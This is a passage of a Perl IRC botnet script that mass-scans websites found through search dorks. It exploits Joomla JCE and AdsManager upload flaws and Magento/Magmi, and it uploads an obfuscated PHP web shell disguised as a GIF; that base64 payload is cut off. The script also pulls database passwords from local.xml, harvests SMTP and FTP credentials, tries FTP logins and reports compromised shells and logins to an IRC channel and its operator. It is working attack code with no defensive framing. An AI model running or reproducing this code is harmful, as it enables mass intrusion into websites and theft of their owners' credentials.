  3289.     my $logo = $_[4];
  3290.  
  3291.     my $coba = $bulusukan."wew.php?url=".$site;
  3292.  
  3293.     my $taik = &get_content($coba);
  3294.  
  3295.     if ($taik =~ /Aplod Berhasil/i) {
  3296.  
  3297.     my $xmlrpc = "http://".$site."includes/xmlrpc.php";
  3298.  
  3299.     my $smtpluph = "http://".$site."includes/xmlrpc.php?x=spread";
  3300.  
  3301.     my $perl = "http://".$site."recky.php";
  3302.  
  3303.     my $php = "http://".$site."metri.php";
  3304.  
  3305.     my $check = &get_content($xmlrpc."?x=spread"); &get_content($xmlrpc."?cpanel");
  3306.  
  3307.     if ($check =~ /recky aka bogel/) {
  3308.  
  3309.     my $safe = "";
  3310.  
  3311.     my $os   = "";
  3312.  
  3313.     my $free  = "";
  3314.  
  3315.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3316.  
  3317.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3318.  
  3319.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3320.  
  3321.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3322.  
  3323.     &msg("$admin","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3324.  
  3325.     &msg("$nick","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3326.  
  3327.     &msg("$chan","$adslogo15,1[4@15$engine15][4@15SheLL15]9 Target Sent to 7*8 $nick 7* 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3328.  
  3329.     &smtp($smtpluph,$chan,$site,$engine);
  3330.  
  3331.     }
  3332.  
  3333. }
  3334.  
  3335. }
  3336.  
  3337.  
  3338.  
  3339. sub adsxp3() {
  3340.  
  3341.     my $chan = $_[0];
  3342.  
  3343.     my $site = $_[1];
  3344.  
  3345.     my $engine = $_[2];
  3346.  
  3347.     my $nick = $_[3];
  3348.  
  3349.     my $logo = $_[4];
  3350.  
  3351.     my $coba = $bulusukan."wew2.php?url=".$site;
  3352.  
  3353.     my $taik = &get_content($coba);
  3354.  
  3355.     if ($taik =~ /Upload Success/i) {
  3356.  
  3357.     my $xmlrpc = "http://".$site."logs/xmlrpc.php";
  3358.  
  3359.     my $smtpluph = "http://".$site."logs/xmlrpc.php?x=spread";
  3360.  
  3361.     my $perl = "http://".$site."recky.php";
  3362.  
  3363.     my $php = "http://".$site."metri.php";
  3364.  
  3365.     my $check = &get_content($xmlrpc."?x=spread"); &get_content($xmlrpc."?cpanel");
  3366.  
  3367.     if ($check =~ /recky aka bogel/) {
  3368.  
  3369.     my $safe = "";
  3370.  
  3371.     my $os   = "";
  3372.  
  3373.     my $free  = "";
  3374.  
  3375.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3376.  
  3377.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3378.  
  3379.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3380.  
  3381.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3382.  
  3383.     &msg("$admin","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3384.  
  3385.     &msg("$nick","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3386.  
  3387.     &msg("$chan","$adslogo15,1[4@15$engine15][4@15SheLL15]9 Target Sent to 7*8 $nick 7* 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3388.  
  3389.     &smtp($smtpluph,$chan,$site,$engine);
  3390.  
  3391.     }
  3392.  
  3393. }
  3394.  
  3395. }
  3396.  
  3397.  
  3398.  
  3399. sub adsxp4() {
  3400.  
  3401.     my $chan = $_[0];
  3402.  
  3403.     my $site = $_[1];
  3404.  
  3405.     my $engine = $_[2];
  3406.  
  3407.     my $nick = $_[3];
  3408.  
  3409.     my $logo = $_[4];
  3410.  
  3411.     my $coba = $bulusukan."wew3.php?url=".$site;
  3412.  
  3413.     my $taik = &get_content($coba);
  3414.  
  3415.     if ($taik =~ /Upload Success/i) {
  3416.  
  3417.     my $xmlrpc = "http://".$site."components/xmlrpc.php";
  3418.  
  3419.     my $smtpluph = "http://".$site."components/xmlrpc.php?x=spread";
  3420.  
  3421.     my $perl = "http://".$site."recky.php";
  3422.  
  3423.     my $php = "http://".$site."metri.php";
  3424.  
  3425.     my $check = &get_content($xmlrpc."?x=spread"); &get_content($xmlrpc."?cpanel");
  3426.  
  3427.     if ($check =~ /recky aka bogel/) {
  3428.  
  3429.     my $safe = "";
  3430.  
  3431.     my $os   = "";
  3432.  
  3433.     my $free  = "";
  3434.  
  3435.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3436.  
  3437.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3438.  
  3439.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3440.  
  3441.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3442.  
  3443.     &msg("$admin","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3444.  
  3445.     &msg("$nick","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3446.  
  3447.     &msg("$chan","$adslogo15,1[4@15$engine15][4@15SheLL15]9 Target Sent to 7*8 $nick 7* 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3448.  
  3449.     &smtp($smtpluph,$chan,$site,$engine);
  3450.  
  3451.     }
  3452.  
  3453. }
  3454.  
  3455. }
  3456.  
  3457.  
  3458.  
  3459. sub findx() {
  3460.  
  3461.     my $chan = $_[0];
  3462.  
  3463.     my $site = $_[1];
  3464.  
  3465.     my $engine = $_[2];
  3466.  
  3467.     my $nick = $_[3];
  3468.  
  3469.     my $logo = $_[4];
  3470.  
  3471.     my $xXx = "http://".$site."tmp/plupload/index.php";
  3472.  
  3473.     my $xOx = "http://".$site."images/com_adsmanager/ads/uploaded/index.php";
  3474.  
  3475.     my $check = &get_content($xXx);
  3476.  
  3477.     my $check2 = &get_content($xOx);
  3478.  
  3479.     if ($check =~ /recky aka bogel/i) {
  3480.  
  3481.     my $safe = "";
  3482.  
  3483.     my $os   = "";
  3484.  
  3485.     my $free  = "";
  3486.  
  3487.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3488.  
  3489.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3490.  
  3491.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3492.  
  3493.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3494.  
  3495.     &msg("$admin","$adslogo15,1[15@4$engine15][15@4SheLL15]9 $xXx 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3496.  
  3497.     &msg("$nick","$adslogo15,1[15@4$engine15][15@4SheLL15]9 $xXx 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3498.  
  3499.     &msg("$chan","$adslogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3500.  
  3501. }
  3502.  
  3503.     if ($check2 =~ /recky aka bogel/i) {
  3504.  
  3505.     my $safe = "";
  3506.  
  3507.     my $os   = "";
  3508.  
  3509.     my $free  = "";
  3510.  
  3511.     if ($check2 =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3512.  
  3513.     if ($check2 =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3514.  
  3515.     if ($check2 =~ m/OS : (.*?)<br>/) {$os = $1;}
  3516.  
  3517.     if ($check2 =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3518.  
  3519.     &msg("$admin","$adslogo15,1[15@4$engine15][15@4SheLL15]9 $xOx 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3520.  
  3521.     &msg("$nick","$adslogo15,1[15@4$engine15][15@4SheLL15]9 $xOx 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3522.  
  3523.     &msg("$chan","$adslogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3524.  
  3525.     }
  3526.  
  3527. }
  3528.  
  3529. ##
  3530.  
  3531. sub mag_exploit() {
  3532.  
  3533.     my $chan = $_[0];
  3534.  
  3535.     my $bug = $_[1];
  3536.  
  3537.     my $dork = $_[2];
  3538.  
  3539.     my $engine = $_[3];
  3540.  
  3541.     my $nick = $_[4];
  3542.  
  3543.     my $count = 0;
  3544.  
  3545.     my @list = &search_engine($chan,$bug,$dork,$engine,$maglogo,$nick);
  3546.  
  3547.         my $num = scalar(@list);
  3548.  
  3549.         if ($num > 0){
  3550.  
  3551.         foreach my $site(@list){
  3552.  
  3553.     $count++;
  3554.  
  3555.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  3556.  
  3557.         my $test = "http://".$site."/app/etc/local.xml";
  3558.  
  3559.         my $testi= "http://".$site."/magmi/web/plugin_upload.php";
  3560.  
  3561.         my $teste= &get_content($testi);
  3562.  
  3563.         my $html = &get_content($test);
  3564.  
  3565.         if ($html =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/i) {
  3566.  
  3567.         my $host = " ";
  3568.  
  3569.         if ($html =~ /<host><!\[\CDATA\[(.*)\]\]\><\/host>/) {$host=$1;}
  3570.  
  3571.         if ($html =~ /<username><!\[CDATA\[(.*)\]\]\><\/username>/){$user=$1;}
  3572.  
  3573.         if ($html =~ /<password><!\[CDATA\[(.*)\]\]\><\/password>/){$pass=$1;}
  3574.  
  3575.         if ($html =~ /<dbname><!\[CDATA\[(.*)\]\]\><\/dbname>/){$dbname=$1;}
  3576.  
  3577.         &msg("$chan","[15@4$engine15]11 From $maglogo to You .. =>9 http://".$site."   ");
  3578.  
  3579.         &msg("$chan","[15@4$engine15]11 http://".$site." [+]hostname:".$host." [+]username:".$user." [+]password:".$pass." [+]dbname:".$dbname."");
  3580.  
  3581.         #&msg("$chan","[15@4$engine15]4http://".$site." 11[+]hostname:11".$host."    ");
  3582.  
  3583.         #&msg("$chan","[15@4$engine15]4http://".$site." 11[+]username:11".$user."    ");
  3584.  
  3585.         #&msg("$chan","[15@4$engine15]4http://".$site." 11[+]password:11".$pass."    ");
  3586.  
  3587.         #&msg("$chan","[15@4$engine15]4http://".$site." 11[+]dbname  :11".$dbname."  ");
  3588.  
  3589.         &magmi_xpl($teste,$chan,$site,$engine,$nick);
  3590.  
  3591.         &bogex2($html,$chan,$site,$engine,$nick);
  3592.  
  3593.         if ($user =~ /_/) {@users = split("_", $user); $usr = $users[0];}
  3594.  
  3595.         my $ceklog = "ftp://".$usr.":".$pass."@".$site."";
  3596.  
  3597.         my $ceklog2 = "ftp://".$user.":".$pass."@".$site."";
  3598.  
  3599.         my $ftplog = &get_content($ceklog);
  3600.  
  3601.         my $ftplog2 = &get_content($ceklog2);
  3602.  
  3603.         if ($ftplog =~ /ftp/) {
  3604.  
  3605.         &msg("$admin","$maglogo15,1[4@15$engine15][4@15FTP15]9 ftp://".$site." 7login 3:9 ".$usr." 7|7 Pass 3:9 ".$pass."");
  3606.  
  3607.         &msg("$nick","$maglogo15,1[4@15$engine15][4@15FTP15]9 ftp://".$site." 7login 3:9 ".$usr." 7|7 Pass 3:9 ".$pass."");
  3608.  
  3609.         &msg("$chan","$maglogo15,1[4@15$engine15][4@15FTP15]9 PRIVATE FTP Sent to 7$nick ");
  3610.  
  3611.         }
  3612.  
  3613.         if ($ftplog2 =~ /ftp/) {
  3614.  
  3615.         &msg("$admin","$maglogo15,1[4@15$engine15][4@15FTP15]9 ftp://".$site." 7login 3:9 ".$user." 7|7 Pass 3:9 ".$pass."");
  3616.  
  3617.         &msg("$nick","$maglogo15,1[4@15$engine15][4@15FTP15]9 ftp://".$site." 7login 3:9 ".$user." 7|7 Pass 3:9 ".$pass."");
  3618.  
  3619.         &msg("$chan","$maglogo15,1[4@15$engine15][4@15FTP15]9 PRIVATE FTP Sent to 7$nick ");
  3620.  
  3621.         #&ssh_connect($test,$host,$user,$pass,$chan,$engine,$nick);sleep(1);
  3622.  
  3623.                 }
  3624.  
  3625.             }
  3626.  
  3627.         }
  3628.  
  3629.     }
  3630.  
  3631. }
  3632.  
  3633. ##
  3634.  
  3635.  
  3636.  
  3637. sub jce_exploit() {
  3638.  
  3639.     my $chan = $_[0];
  3640.  
  3641.     my $bug = $_[1];
  3642.  
  3643.     my $dork = $_[2];
  3644.  
  3645.     my $engine = $_[3];
  3646.  
  3647.     my $nick = $_[4];
  3648.  
  3649.     my $count = 0;
  3650.  
  3651.     my @list = &search_engine($chan,$bug,$dork,$engine,$jcelogo,$nick);
  3652.  
  3653.     my $num = scalar(@list);
  3654.  
  3655.     if ($num > 0){
  3656.  
  3657.         foreach my $site(@list){
  3658.  
  3659.         $count++;
  3660.  
  3661.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  3662.  
  3663.         my $xmlrpc  = "http://".$site."tmp/bogel.php.1";
  3664.  
  3665.         my $bot  = "http://".$site."tmp/metri.php";
  3666.  
  3667.         my $box  = "http://".$site."tmp/recky.php";
  3668.  
  3669.         my $smtpluph  = "http://".$site."tmp/bogel.php?db";
  3670.  
  3671.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  3672.  
  3673.         my $status = &jce_load($site); &jce_load($site); sleep(3);
  3674.  
  3675.         if ($status = 1) {
  3676.  
  3677.         my $check = &get_content($xmlrpc."?db");
  3678.  
  3679.         if ($check =~ /bogel - exploit/) {
  3680.  
  3681.         my $safe = "";
  3682.  
  3683.         my $os   = "";
  3684.  
  3685.         my $uid  = "";
  3686.  
  3687.         my $smtphost = "";
  3688.  
  3689.         my $smtpuser = "";
  3690.  
  3691.         my $smtppass = "";
  3692.  
  3693.         my $ftphost = "";
  3694.  
  3695.         my $ftpuser = "";
  3696.  
  3697.         my $ftppass = "";
  3698.  
  3699.         if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  3700.  
  3701.         if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  3702.  
  3703.         if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  3704.  
  3705.         if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;}
  3706.  
  3707.         if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;}
  3708.  
  3709.         if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;}
  3710.  
  3711.         if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;}
  3712.  
  3713.         if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;}
  3714.  
  3715.         if ($check =~ m/\$ftp_port = '(.+?)';/i){$ftpport=$1;}
  3716.  
  3717.         if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;}
  3718.  
  3719.         if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;}
  3720.  
  3721.         &msg("$chanx","$jcelogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3722.  
  3723.         &msg("$admin","$jcelogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3724.  
  3725.         &msg("$chan","$jcelogo15,1[4@15$engine15][4@15SheLL15]9 Target Sent to 7*8 $nick 7* 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3726.  
  3727.         &bogex($smtpluph,$chan,$site,$engine);
  3728.  
  3729.         &smtp($smtpluph,$chan,$site,$engine);
  3730.  
  3731.         if (defined($ftpuser)){
  3732.  
  3733.         &msg("$admin","15,1[7ftp15]7 $site7 $ftpuser $ftppass");
  3734.  
  3735.         }
  3736.  
  3737.         if (defined($smtpuser)){
  3738.  
  3739.         &msg("$admin","$jcelogo15,1[4@15$engine15][4@15SMTP15]7 $site14 -7 $smtphost 14|7 $smtpport 14|7 $smtpuser 14|7 $smtppass ");
  3740.  
  3741.             }
  3742.  
  3743.         }
  3744.  
  3745.     }
  3746.  
  3747.         } exit;
  3748.  
  3749.             }
  3750.  
  3751.         }
  3752.  
  3753.     }
  3754.  
  3755. }
  3756.  
  3757.  
  3758.  
  3759. sub jce_load() {
  3760.  
  3761.     my $success = 0;
  3762.  
  3763.     my $url = $_[0];
  3764.  
  3765.        $url =~ s/http:\/\///;
  3766.  
  3767.     my $host = $url;
  3768.  
  3769.     my $chan = $url;
  3770.  
  3771.        $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  3772.  
  3773.        $chan =~ s/(.*)\/[^\/]*$/\1/;
  3774.  
  3775.        $chan .= "/";
  3776.  
  3777.        $chan =~ s/([-a-zA-Z0-9\.]+)/$2/;
  3778.  
  3779. if ($chan eq "") { $chan = "/" }
  3780.  
  3781. $header1P = "POST ".$chan."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
  3782.  
  3783. $header1P2 = "POST ".$chan."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
  3784.  
  3785. $header2 = "Host: $host";
  3786.  
  3787. $header3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
  3788.  
  3789. $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
  3790.  
  3791. $header5 = "Content-Length: 50000";
  3792.  
  3793. $header6 = "-----------------------------41184676334";
  3794.  
  3795. $header7 = 'Content-Disposition: form-data; name="upload-dir"';
  3796.  
  3797. $header8 = '/';
  3798.  
  3799. $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
  3800.  
  3801. $header10 = 'Content-Type: application/octet-stream';
  3802.  
  3803. $header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
  3804.  
  3805. $header12 = "0";
  3806.  
  3807. $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="bogel.gif"';
  3808.  
  3809. $header14 = 'Content-Type: image/gif';
  3810.  
  3811. $header15 = 'GIF89aG';
  3812.  
  3813. $header16 = "<?php eval(gzinflate(str_rot13(base64_decode('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